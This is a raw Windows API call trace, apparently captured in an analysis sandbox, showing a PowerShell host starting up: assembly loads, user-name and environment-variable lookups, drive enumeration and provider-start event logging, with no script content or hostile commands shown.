[0080.795] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0080.795] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0080.796] CoTaskMemAlloc (cb=0x804) returned 0x1b8331c0
[0080.796] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8331c0, nSize=0x16d468 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x16d468) returned 0x1
[0080.796] CoTaskMemFree (pv=0x1b8331c0)
[0080.796] CoTaskMemAlloc (cb=0x204) returned 0x2ba920
[0080.796] GetUserNameW (in: lpBuffer=0x2ba920, pcbBuffer=0x16d4a8 | out: lpBuffer="aETAdzjz", pcbBuffer=0x16d4a8) returned 1
[0080.796] CoTaskMemFree (pv=0x2ba920)
[0080.796] ReportEventW (hEventLog=0x1b8f0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3d67d08*="Environment", lpRawData=0x3d67a98) returned 1
[0080.802] CoTaskMemAlloc (cb=0x104) returned 0x256340
[0080.802] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x256340, nSize=0x80 | out: lpBuffer="") returned 0x0
[0080.802] CoTaskMemFree (pv=0x256340)
[0080.802] CoTaskMemAlloc (cb=0x104) returned 0x256340
[0080.802] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x256340, nSize=0x80 | out: lpBuffer="C:") returned 0x2
[0080.802] CoTaskMemFree (pv=0x256340)
[0080.802] CoTaskMemAlloc (cb=0x104) returned 0x256340
[0080.802] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x256340, nSize=0x80 | out: lpBuffer="\\Users\\aETAdzjz") returned 0xf
[0080.802] CoTaskMemFree (pv=0x256340)
[0080.803] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x16d010, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
[0080.803] SetErrorMode (uMode=0x1) returned 0x1
[0080.803] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0x16d220 | out: lpFileInformation=0x16d220*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
[0080.803] SetErrorMode (uMode=0x1) returned 0x1
[0080.823] GetLogicalDrives () returned 0x4
[0080.833] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x16cd80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
[0080.834] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0080.834] SetErrorMode (uMode=0x1) returned 0x1
[0080.834] CoTaskMemAlloc (cb=0x68) returned 0x1b7f5800
[0080.834] CoTaskMemAlloc (cb=0x68) returned 0x1b7f5480
[0080.834] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1b7f5800, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x16d1f0, lpMaximumComponentLength=0x16d1ec, lpFileSystemFlags=0x16d1e8, lpFileSystemNameBuffer=0x1b7f5480, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x16d1f0*=0x705ba84c, lpMaximumComponentLength=0x16d1ec*=0xff, lpFileSystemFlags=0x16d1e8*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
[0080.834] CoTaskMemFree (pv=0x1b7f5800)
[0080.834] CoTaskMemFree (pv=0x1b7f5480)
[0080.834] SetErrorMode (uMode=0x1) returned 0x1
[0080.834] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0080.835] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x16cf30, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
[0080.835] SetErrorMode (uMode=0x1) returned 0x1
[0080.835] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x16d190 | out: lpFileInformation=0x16d190*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x5492b1a0, ftLastAccessTime.dwHighDateTime=0x1d34750, ftLastWriteTime.dwLowDateTime=0x5492b1a0, ftLastWriteTime.dwHighDateTime=0x1d34750, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
[0080.835] SetErrorMode (uMode=0x1) returned 0x1
[0080.835] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x16cf30, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
[0080.835] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x16cde0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
[0080.835] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0080.835] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x16cd10, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
[0080.835] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0080.835] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x16cd60, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
[0080.835] SetErrorMode (uMode=0x1) returned 0x1
[0080.835] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x16cfc0 | out: lpFileInformation=0x16cfc0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x5492b1a0, ftLastAccessTime.dwHighDateTime=0x1d34750, ftLastWriteTime.dwLowDateTime=0x5492b1a0, ftLastWriteTime.dwHighDateTime=0x1d34750, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
[0080.836] SetErrorMode (uMode=0x1) returned 0x1
[0080.836] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x16cd60, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
[0080.836] SetErrorMode (uMode=0x1) returned 0x1
[0080.836] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x16cfc0 | out: lpFileInformation=0x16cfc0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x5492b1a0, ftLastAccessTime.dwHighDateTime=0x1d34750, ftLastWriteTime.dwLowDateTime=0x5492b1a0, ftLastWriteTime.dwHighDateTime=0x1d34750, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
[0080.836] SetErrorMode (uMode=0x1) returned 0x1
[0080.836] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x16ce00, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
[0080.836] SetErrorMode (uMode=0x1) returned 0x1
[0080.836] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x16d060 | out: lpFileInformation=0x16d060*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x5492b1a0, ftLastAccessTime.dwHighDateTime=0x1d34750, ftLastWriteTime.dwLowDateTime=0x5492b1a0, ftLastWriteTime.dwHighDateTime=0x1d34750, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
[0080.836] SetErrorMode (uMode=0x1) returned 0x1
[0080.836] CoTaskMemAlloc (cb=0x804) returned 0x1b8331c0
[0080.836] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8331c0, nSize=0x16d468 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x16d468) returned 0x1
[0080.837] CoTaskMemFree (pv=0x1b8331c0)
[0080.837] CoTaskMemAlloc (cb=0x204) returned 0x2ba920
[0080.837] GetUserNameW (in: lpBuffer=0x2ba920, pcbBuffer=0x16d4a8 | out: lpBuffer="aETAdzjz", pcbBuffer=0x16d4a8) returned 1
[0080.837] CoTaskMemFree (pv=0x2ba920)
[0080.838] ReportEventW (hEventLog=0x1b8f0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3d6ed60*="FileSystem", lpRawData=0x3d6eaf0) returned 1
[0080.841] CoTaskMemAlloc (cb=0x104) returned 0x256340
[0080.841] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x256340, nSize=0x80 | out: lpBuffer="") returned 0x0
[0080.841] CoTaskMemFree (pv=0x256340)
[0080.841] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0080.841] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cc90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0080.841] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cc90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0080.841] CoTaskMemAlloc (cb=0x804) returned 0x1b8331c0
[0080.841] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8331c0, nSize=0x16d468 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x16d468) returned 0x1
[0080.841] CoTaskMemFree (pv=0x1b8331c0)
[0080.841] CoTaskMemAlloc (cb=0x204) returned 0x2ba920
[0080.841] GetUserNameW (in: lpBuffer=0x2ba920, pcbBuffer=0x16d4a8 | out: lpBuffer="aETAdzjz", pcbBuffer=0x16d4a8) returned 1
[0080.842] CoTaskMemFree (pv=0x2ba920)
[0080.842] ReportEventW (hEventLog=0x1b8f0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3d74550*="Function", lpRawData=0x3d742e0) returned 1
[0080.876] CoTaskMemAlloc (cb=0x104) returned 0x256340
[0080.876] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x256340, nSize=0x80 | out: lpBuffer="") returned 0x0
[0080.876] CoTaskMemFree (pv=0x256340)
[0080.878] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0080.878] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0080.878] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0080.878] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0080.918] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0080.918] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0080.918] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0080.972] CoTaskMemAlloc (cb=0x804) returned 0x1b8331c0
[0080.972] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8331c0, nSize=0x16d468 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x16d468) returned 0x1
[0080.972] CoTaskMemFree (pv=0x1b8331c0)
[0080.972] CoTaskMemAlloc (cb=0x204) returned 0x2ba920
[0080.972] GetUserNameW (in: lpBuffer=0x2ba920, pcbBuffer=0x16d4a8 | out: lpBuffer="aETAdzjz", pcbBuffer=0x16d4a8) returned 1
[0080.972] CoTaskMemFree (pv=0x2ba920)
[0080.973] ReportEventW (hEventLog=0x1b8f0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ed77d8*="Registry", lpRawData=0x2ed7568) returned 1
[0080.977] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0080.977] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0080.977] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0080.977] CoTaskMemAlloc (cb=0x804) returned 0x1b8331c0
[0080.977] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8331c0, nSize=0x16d468 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x16d468) returned 0x1
[0080.977] CoTaskMemFree (pv=0x1b8331c0)
[0080.977] CoTaskMemAlloc (cb=0x204) returned 0x2ba920
[0080.977] GetUserNameW (in: lpBuffer=0x2ba920, pcbBuffer=0x16d4a8 | out: lpBuffer="aETAdzjz", pcbBuffer=0x16d4a8) returned 1
[0080.977] CoTaskMemFree (pv=0x2ba920)
[0080.978] ReportEventW (hEventLog=0x1b8f0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2edcba0*="Variable", lpRawData=0x2edc930) returned 1
[0080.983] CoTaskMemAlloc (cb=0x104) returned 0x256340
[0080.983] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x256340, nSize=0x80 | out: lpBuffer="") returned 0x0
[0080.983] CoTaskMemFree (pv=0x256340)
[0080.996] CoTaskMemAlloc (cb=0x104) returned 0x256340
[0080.996] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x256340, nSize=0x80 | out: lpBuffer="") returned 0x0
[0080.996] CoTaskMemFree (pv=0x256340)
[0080.997] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x16cd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
[0080.997] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x16cc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
[0080.997] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x16cc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
[0080.998] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x16cc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
[0081.046] CoTaskMemAlloc (cb=0x804) returned 0x1b8331c0
[0081.046] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8331c0, nSize=0x16d468 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x16d468) returned 0x1
[0081.095] CoTaskMemFree (pv=0x1b8331c0)
[0081.095] CoTaskMemAlloc (cb=0x204) returned 0x2ba920
[0081.095] GetUserNameW (in: lpBuffer=0x2ba920, pcbBuffer=0x16d4a8 | out: lpBuffer="aETAdzjz", pcbBuffer=0x16d4a8) returned 1
[0081.096] CoTaskMemFree (pv=0x2ba920)
[0081.096] ReportEventW (hEventLog=0x1b8f0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ef0cd8*="Certificate", lpRawData=0x2ef0a68) returned 1
[0081.100] CoTaskMemAlloc (cb=0x104) returned 0x256340
[0081.100] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x256340, nSize=0x80 | out: lpBuffer="") returned 0x0
[0081.100] CoTaskMemFree (pv=0x256340)
[0081.101] GetLogicalDrives () returned 0x4
[0081.101] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x16d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
[0081.101] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0081.102] CoTaskMemAlloc (cb=0x20e) returned 0x31b050
[0081.102] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x31b050 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop") returned 0x19
[0081.102] CoTaskMemFree (pv=0x31b050)
[0081.103] CoTaskMemAlloc (cb=0x104) returned 0x256340
[0081.103] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x256340, nSize=0x80 | out: lpBuffer="") returned 0x0
[0081.103] CoTaskMemFree (pv=0x256340)
[0081.103] CoTaskMemAlloc (cb=0x104) returned 0x256340
[0081.103] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x256340, nSize=0x80 | out: lpBuffer="") returned 0x0
[0081.103] CoTaskMemFree (pv=0x256340)
[0081.107] CoTaskMemAlloc (cb=0x104) returned 0x256340
[0081.107] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x256340, nSize=0x80 | out: lpBuffer="") returned 0x0
[0081.107] CoTaskMemFree (pv=0x256340)
[0081.108] CoTaskMemAlloc (cb=0x104) returned 0x256340
[0081.108] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x256340, nSize=0x80 | out: lpBuffer="") returned 0x0
[0081.108] CoTaskMemFree (pv=0x256340)
[0081.108] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop", nBufferLength=0x105, lpBuffer=0x16ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x0) returned 0x19
[0081.108] SetErrorMode (uMode=0x1) returned 0x1
[0081.108] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop" (normalized: "c:\\users\\aetadzjz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x16d0b0 | out: lpFileInformation=0x16d0b0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0xd5210210, ftLastAccessTime.dwHighDateTime=0x1d34cee, ftLastWriteTime.dwLowDateTime=0xd5210210, ftLastWriteTime.dwHighDateTime=0x1d34cee, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
[0081.109] SetErrorMode (uMode=0x1) returned 0x1
[0081.109] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop", nBufferLength=0x105, lpBuffer=0x16ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x0) returned 0x19
[0081.109] SetErrorMode (uMode=0x1) returned 0x1
[0081.109] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop" (normalized: "c:\\users\\aetadzjz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x16d0b0 | out: lpFileInformation=0x16d0b0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0xd5210210, ftLastAccessTime.dwHighDateTime=0x1d34cee, ftLastWriteTime.dwLowDateTime=0xd5210210, ftLastWriteTime.dwHighDateTime=0x1d34cee, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
[0081.109] SetErrorMode (uMode=0x1) returned 0x1
[0081.109] CoTaskMemAlloc (cb=0x104) returned 0x256340
[0081.109] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x256340, nSize=0x80 | out: lpBuffer="") returned 0x0
[0081.109] CoTaskMemFree (pv=0x256340)
[0081.112] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop", nBufferLength=0x105, lpBuffer=0x16cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x0) returned 0x19
[0081.112] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x16ce60, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
[0081.112] SetErrorMode (uMode=0x1) returned 0x1
[0081.112] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x16d070 | out: lpFileInformation=0x16d070*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x5492b1a0, ftLastAccessTime.dwHighDateTime=0x1d34750, ftLastWriteTime.dwLowDateTime=0x5492b1a0, ftLastWriteTime.dwHighDateTime=0x1d34750, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
[0081.112] SetErrorMode (uMode=0x1) returned 0x1
[0081.113] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x16ce60, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
[0081.113] SetErrorMode (uMode=0x1) returned 0x1
[0081.113] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x16d070 | out: lpFileInformation=0x16d070*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x5492b1a0, ftLastAccessTime.dwHighDateTime=0x1d34750, ftLastWriteTime.dwLowDateTime=0x5492b1a0, ftLastWriteTime.dwHighDateTime=0x1d34750, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
[0081.113] SetErrorMode (uMode=0x1) returned 0x1
[0081.113] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x16ce70, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
[0081.113] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x16cd60, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
[0081.113] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x16ce60, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
[0081.113] SetErrorMode (uMode=0x1) returned 0x1
[0081.113] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x16d070 | out: lpFileInformation=0x16d070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2329edc0, ftLastAccessTime.dwHighDateTime=0x1d2f180, ftLastWriteTime.dwLowDateTime=0x2329edc0, ftLastWriteTime.dwHighDateTime=0x1d2f180, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
[0081.113] SetErrorMode (uMode=0x1) returned 0x1
